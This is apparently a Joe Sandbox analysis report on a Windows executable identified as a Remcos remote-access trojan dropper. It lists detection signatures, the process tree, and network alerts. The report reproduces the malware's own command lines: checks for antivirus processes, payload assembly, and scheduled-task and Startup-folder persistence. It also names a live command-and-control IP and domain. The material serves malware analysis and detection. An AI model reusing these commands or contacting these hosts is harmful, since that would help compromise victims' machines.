Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sXpIsdpkzy.exe

Overview

General Information

Sample name:sXpIsdpkzy.exe
renamed because original name is a hash value
Original sample name:28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8.exe
Analysis ID:1573901
MD5:9dcf036916a9158cc7087c80374db9ae
SHA1:69d9b8ffe2c74adebe1d1dcca6f42cb394e3f045
SHA256:28773fb2aff96e836707d9ffd5e8aa706d0ce54c956fbee42b9dd9b150e997e8
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • sXpIsdpkzy.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\sXpIsdpkzy.exe" MD5: 9DCF036916A9158CC7087C80374DB9AE)
    • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6140 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6060 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6844 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5948 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2208 cmdline: cmd /c md 33988 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6232 cmdline: findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5900 cmdline: cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Paintball.com (PID: 6244 cmdline: Paintball.com w MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • cmd.exe (PID: 6252 cmdline: cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 1516 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6180 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7736 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Securify360.scr (PID: 6056 cmdline: "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
  • wscript.exe (PID: 3976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Securify360.scr (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\registros.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    System Summary

    barindex
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 181.131.217.244, DestinationIsIpv6: false, DestinationPort: 1515, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\33988\Paintball.com, Initiated: true, ProcessId: 6244, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49930
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6252, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, ProcessId: 7972, ProcessName: schtasks.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", ProcessId: 7736, ProcessName: wscript.exe
    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\33988\Paintball.com, ProcessId: 6244, TargetFilename: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sXpIsdpkzy.exe", ParentImage: C:\Users\user\Desktop\sXpIsdpkzy.exe, ParentProcessId: 7540, ParentProcessName: sXpIsdpkzy.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd, ProcessId: 7724, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6252, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F, ProcessId: 7972, ProcessName: schtasks.exe
    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\33988\Paintball.com, ProcessId: 6244, TargetFilename: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js", ProcessId: 7736, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1516, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7724, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5948, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-12T17:40:41.645996+010020327761Malware Command and Control Activity Detected192.168.2.1049930181.131.217.2441515TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-12T17:40:45.938918+010020327771Malware Command and Control Activity Detected181.131.217.2441515192.168.2.1049930TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-12T17:40:47.751878+010028033043Unknown Traffic192.168.2.1049944178.237.33.5080TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: sXpIsdpkzy.exeReversingLabs: Detection: 52%
    Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.8% probability
    Source: sXpIsdpkzy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: sXpIsdpkzy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00FF4005
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00FFC2FF
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_00FF494A
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_00FFCD9F
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFCD14 FindFirstFileW,FindClose,19_2_00FFCD14
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00FFF5D8
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00FFF735
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_00FFFA36
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00FF3CE2
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\33988\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\33988Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49930 -> 181.131.217.244:1515
    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1515 -> 192.168.2.10:49930
    Source: global trafficTCP traffic: 192.168.2.10:49930 -> 181.131.217.244:1515
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox ViewASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49944 -> 178.237.33.50:80
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_010029BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_010029BA
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: OFfdlkbKbwMNYjhkX.OFfdlkbKbwMNYjhkX
    Source: global trafficDNS traffic detected: DNS query: 3diciembre.con-ip.com
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: sXpIsdpkzy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: sXpIsdpkzy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
    Source: sXpIsdpkzy.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
    Source: sXpIsdpkzy.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.comodoca.com0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.sectigo.com0
    Source: sXpIsdpkzy.exeString found in binary or memory: http://ocsp.sectigo.com00
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000000.1326888462.00000000009C9000.00000002.00000001.01000000.00000007.sdmp, Securify360.scr, 00000013.00000000.1361219033.0000000001059000.00000002.00000001.01000000.00000009.sdmp, Securify360.scr, 00000016.00000000.1456357468.0000000001059000.00000002.00000001.01000000.00000009.sdmp, Zinc.0.dr, Securify360.scr.11.dr, Paintball.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: sXpIsdpkzy.exeString found in binary or memory: https://sectigo.com/CPS0
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Paintball.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: Paintball.com, 0000000B.00000003.1336690227.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Paintball.com, 0000000B.00000003.2286342708.0000000001FE7000.00000004.00000020.00020000.00000000.sdmp, Securify360.scr.11.dr, Variable.0.dr, Paintball.com.2.drString found in binary or memory: https://www.globalsign.com/repository/06

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\33988\Paintball.comJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_01004830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_01004830
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_01004632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_01004632
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_0101D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_0101D164

    E-Banking Fraud

    barindex
